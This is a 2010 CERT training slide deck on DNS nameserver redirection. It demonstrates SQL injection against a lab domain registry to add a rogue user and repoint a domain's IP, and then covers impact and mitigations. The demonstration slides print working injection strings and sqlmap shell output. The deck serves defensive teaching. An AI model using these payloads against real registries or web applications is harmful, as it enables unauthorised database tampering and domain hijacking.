DNS Security for CERTs- Attack Scenarios & Demonstrations –

NameServer Redirection

Chris EvansDelta Risk, LLC

7 March 2010

1

What You Will Need for the Exercise

• Please Watch the Live Demonstration in Front

– We will be targeting the web registry system

• You may need your Ubuntu VM to:

– Prior to attack, verify the Web Registry System URL: http://www.tld1 points to 192.168.101.50

– After attack, determine where http://www.tld1 points to

2

Description – NameServer Redirection

• Change of Registration or Delegation Data– Intentional

• Disgruntled employee changes registry data

• Outsiders pretending to be a customer request an “update” to their account

• Hackers change the registry database directly through web attacks

– Accidental• Untrained employee

• Typos in registry data

3

Domain1 NS 1.1.1.1

Domain2 NS 2.2.2.2

Domain3 NS 3.3.3.3 -> 5.5.5.5

Attacker now controls

resolutions for Domain3

Case Study

4

• SQL Injection Top List of Data Breach Attacks– SQL Injection used in 60% of all data breach attacks,

19% of all security breaches on the Internet

DarkReading.com

– Insecure programming techniques combined with proliferation of web based application = trouble

– Increase in automated techniques to detect and exploit vulnerabilities = double trouble

Case Study

• Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection

– Attackers created new user accounts within the system

– These accounts were used to modify existing registrations and re-delegate sites to malicious content

5

http://www.icann.org/en/security/sa-2009-0001.htm

Attack Demonstration

6

SELECT * FROM table WHERE username=‘mike

Your website is designed to perform a query during a

valid login attempt:

SQL Injection …. Well…. Injects SQL statements

into your backend database query:

SELECT * FROM table WHERE username=‘mike’ AND password=‘!QAZ2wsx’

‘; INSERT hacker INTO database

New SQL statement

injected….

…original SQL

statement gets

commented out “--”

Demonstration – Attacker View

7

One single ‘ nets:

table name and two variables

';insert into srs_users values(101,'hacker','password')--

Adds user hacker to the database…….

' group by srs_users.username having 1=1--

Reconaisance & Table Mapping...

Use SQL Injection tool to gain a shell to

the database <SQL-map>:sql-shell> select * from srs_regs where fqdn='rogue.tld1'

do you want to retrieve the SQL statement output? [Y/n] y

[15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where

fqdn='rogue.tld1''

[15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself

[15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on

system databases, sqlmap is going to use 'public' schema as database name

[15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'

[15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'

[15:15:56] [INFO] retrieved: 9

[15:15:57] [INFO] retrieved: regid

[15:15:59] [INFO] retrieved: type

[15:16:01] [INFO] retrieved: fqdn

[15:16:03] [INFO] retrieved: ns

[15:16:04] [INFO] retrieved: ip

[15:16:06] [INFO] retrieved: recordtype

[15:16:10] [INFO] retrieved: hostname

[15:16:14] [INFO] retrieved: ownerid

[15:16:17] [INFO] retrieved: parentid

Demonstration – Attacker View (cont.)

8

Enumerating

the Database…

'; update srs_regs set (ip)=('192.168.85.5') where regid = 1 --

…then update a

record with bad IP…

Demonstration – Server View

9

; <<>> DiG 9.5.1-P2 <<>> www.tld1

;; global options: printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392

;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:

0

;; QUESTION SECTION:

;www.tld1. IN A

;; ANSWER SECTION:

www.tld1. 180 IN A 192.168.101.50

;; AUTHORITY SECTION:

Demonstration – User View

10

1

2

One minute

you get the

correct IP and

website…

; <<>> DiG 9.5.1-P2 <<>> www.tld1

;; global options: printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392

;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL:

0

;; QUESTION SECTION:

;www.tld1. IN A

;; ANSWER SECTION:

www.tld1. 180 IN A 192.168.85.5

;; AUTHORITY SECTION:

…the next

you’re browsing

whatever the

hacker wants

you to!

Impact

• Registry suffers public relations hit, potential loss of customers & revenue

• Loss of brand reputation, customers, or revenue for registrants who are victimized

• Effect of attack persists even after detection and mitigation because of TTLs

11

Mitigation & Response Strategies

• SQL Injection

– Practice secure coding principles in any web-based application that has database connectivity

– Validate input and prevent “magic characters”

– Use an Web Application Firewall to filter/validate the input to your web application

– Use database logging to track queries and the pages they are being run on.

– Frequently audit your web applications (not just the systems they run on!)

12

Mitigation & Response Strategies

• Nameserver Redirection

– Multi-factor authentication of changes

– Out-of-band check of changes (e.g. phone, in-person)

– Domain “locks” which prevent updates unless manually approved

– Validation of changes before publishing new zone files

– Processes for contacting ISPs to “clear” cached entries

– Automated, continuous validation of published data with automated alerting

– Also see ICANN SSAC Report SAC040

13

Mitigation & Response Strategies

• Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim

14

A trusted entity, CERTs can encourage this type of

exchange within their communities

Questions?

15

?